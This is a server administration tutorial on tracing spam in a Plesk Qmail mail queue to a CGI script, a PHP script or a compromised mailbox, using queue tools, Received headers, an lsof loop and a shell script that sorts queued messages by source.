If the Plesk Qmail mail queue is saturated with emails, there is a good chance that your Plesk server is being used to send spam.
On a Plesk server open relaying is not allowed by default, so spam is mostly sent in one of the following ways. Each is explained below point by point.
1) A CGI script run by a user
2) A PHP script
3) A compromised email account
First, let's look at the mail queue:
# /var/qmail/bin/qmail-qstat
messages in queue: 22507
messages in queue but not yet preprocessed: 0
As you can see above, there is a large number of emails in the mail queue. The source of these emails could be either a PHP/CGI script or an authorized email account on the server.
Let’s start by reading the message headers with ‘qmail-qread’:
# /var/qmail/bin/qmail-qread
5 Nov 2012 11:50:17 GMT #768752 1231
	remote user1@domain1.com
	remote user2@domain1.com
	remote user1@domain2.com
This lists the sender and the recipients of every email in the mail queue.
In the above example, #768752 is the message ID. Next, find the location of this message so you can read its complete header:
# find /var/qmail/queue/mess/ -name 768752
/var/qmail/queue/mess/0/768752
Above is the full path to the message file. Now open the file and look for the “Received” line:
# cat /var/qmail/queue/mess/0/768752 | more
The “Received” line shows where the message was received from, or how it was invoked.
1) If the message was sent via a CGI script by a user, the line shows the UID of that user, as below:
Received: (qmail 26193 invoked by uid 10001); 5 Nov 2012 11:50:17
Now search for UID 10001 in the passwd file to find the domain it belongs to:
# grep ':10001:' /etc/passwd
This shows the system user, and therefore the domain, that UID 10001 belongs to. The colons anchor the match so that other UIDs containing the digits 10001 (such as 110001) are not listed as well.
2) If the email was sent via a PHP script, the “Received” line shows the UID of the Apache user (i.e. 48):
Received: (qmail 26193 invoked by uid 48); 5 Nov 2012 11:50:17 +0000
In that case you have to monitor the PHP scripts in real time, i.e. the scripts that are running while the emails are being sent.
Execute the command below as is while the mail queue is growing rapidly:
# lsof +r 1 -p `ps axww | grep httpd | grep -v grep | \
    awk '{ if(!str) { str=$1 } else { str=str","$1 } } END { print str }'` \
    | grep vhosts | grep php
3) Email accounts are often compromised and used to send bulk/spam email from other locations. In that case the “Received” line contains “invoked from network”:
Received: (qmail 26193 invoked from network); 5 Nov 2012 11:50:17
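The three “Received” patterns above can be checked across the whole queue at once instead of opening files one by one. The script below is an added example and not code from the original post: it reads only the first “Received” header of each file under the queue directory, labels it as cgi:<uid>, php:48 or network, and counts messages per label. The small queue it builds is constructed test data; on a real server the directory to pass is /var/qmail/queue/mess, and UID 48 for Apache is the value used in the post.

```sh
#!/bin/sh
# Added example, not code from the original post. qmail-queue writes a
# "Received: (qmail PID invoked by uid N)" or "invoked from network" line
# as the first header of every file under /var/qmail/queue/mess, so reading
# that one line per file tells you how each queued message was submitted.
# UID 48 (Apache) and UID 10001 are the post's values; the sample queue
# built below is constructed test data so the script runs offline.

# Map one "Received:" line to a source label:
#   cgi:<uid>  submitted locally by a system user (CGI, cron, shell)
#   php:48     submitted by the Apache user, i.e. a PHP script
#   network    submitted over SMTP, usually an authenticated mailbox
#   unknown    anything else
classify_received() {
    case "$1" in
        *"invoked by uid 48)"*) echo "php:48" ;;
        *"invoked by uid "*)
            uid=$(printf '%s\n' "$1" | sed 's/.*invoked by uid \([0-9]*\)).*/\1/')
            echo "cgi:$uid" ;;
        *"invoked from network"*) echo "network" ;;
        *) echo "unknown" ;;
    esac
}

# Classify a queued message file by its first "Received:" header only;
# any later Received: headers are part of the submitted message and can be forged.
classify_message() {
    classify_received "$(sed -n '/^Received: /{p;q;}' "$1")"
}

# Count queued messages per source label, most common first.
# Usage: summarize_queue /var/qmail/queue/mess
summarize_queue() {
    find "$1" -type f | while read -r f; do
        classify_message "$f"
    done | sort | uniq -c | sort -rn
}

# Build a small constructed queue (four messages) so the script runs offline.
make_sample_queue() {
    dir=$(mktemp -d)
    mkdir -p "$dir/0" "$dir/1"
    printf 'Received: (qmail 26193 invoked by uid 10001); 5 Nov 2012 11:50:17\nFrom: a@example.com\n\nbody\n' > "$dir/0/768752"
    printf 'Received: (qmail 26194 invoked by uid 48); 5 Nov 2012 11:50:18\nReceived: from forged.example\n\nbody\n' > "$dir/0/768753"
    printf 'Received: (qmail 26195 invoked by uid 48); 5 Nov 2012 11:50:19\n\nbody\n' > "$dir/1/768754"
    printf 'Received: (qmail 26196 invoked from network); 5 Nov 2012 11:50:20\n\nbody\n' > "$dir/1/768755"
    echo "$dir"
}

# Demo run over the constructed queue; replace with /var/qmail/queue/mess on a server.
sample=$(make_sample_queue)
summarize_queue "$sample"
rm -rf "$sample"
```

Run summarize_queue against /var/qmail/queue/mess as root. A large cgi:<uid> count points at one system user's CGI script (look the UID up in /etc/passwd as above), php:48 points at a PHP script (then use the lsof loop above to catch it running), and network points at a mailbox whose password is being used from elsewhere and should be changed.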